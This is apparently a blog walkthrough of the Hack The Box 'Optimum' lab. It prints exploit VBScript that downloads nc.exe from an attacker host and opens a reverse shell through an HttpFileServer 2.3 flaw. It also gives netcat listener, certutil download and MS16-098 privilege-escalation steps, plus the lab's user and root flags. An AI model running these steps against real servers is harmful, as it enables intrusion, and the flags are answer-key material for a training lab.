[hackthebox] Optimum

This is a relative easy machine, as seen from the matrix the attacks are more related to CVE.

nmap enumeration

nmap -A -p- -T4 -oN optimum -vvv

Http File Server 2.3

As shown in the web browser, the web service is hosted by http file server which is a program for windows to server files via http web service, this is easy to use and setup without too much effort on the user’s end.


httpfileserver 2.3 exploit

A search from the web reveals that httpfileserver 2.3 has a remote code execution exploit written in python.

Reading the exploit code, it is obvious that the python is creating a vb script with the following source code:

dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "http://"+ip_addr+"/nc.exe", False

with bStrm
    .type = 1 '//binary
    .write xHttp.responseBody
    .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite
end with

The exploit code downloads nc.exe from the attacker’s machine then save it as nc.exe in C:\Users\Public. Then execute the script to trigger nc.exe to do a reverse tcp and create a cmd shell, the vulnerability of HFS 2.3 lies on its variable – search
See this:

Get the user flag

I need to turn on a web server that hosts the nc.exe then on another terminal I need to create a nc server to listen on.
On the exploit code I change the ip address to my own tunnel ip address so that the exploit will do a connection back to my nc server.
Step 1:
python3 -m http.server 80
This command has to be executed in the directory that has the nc.exe.

Step 2:
then start my nc server sudo nc -lvnp 443

Step 3:
Modify the ip address within the exploit code, then run it.

python 39161.py 80

The user flag is d0c39409d7b994a9a1389ebf38ef5f73

Get the root

I recommend take a look at https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md

On doing systeminfo the machine is running Windows 2012 R2 standard edition build 9600, there are a few kernel exploits which are usable, I chose the kernel driver exploit MS16-098, this exploit though is related to Windows 8.1 works perfectly on Windows 2012 server as well.
I download the compiled binary bfill.exe then serve a web server for me to download from Optimum.


On the Optimum machine I do certutil -f -urlcache c:\users\kostas\downloads\bfill.exe

The run the exploit to get root.


the root flag is 51ed1b36553c8461f4552c2e92b3eeed


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s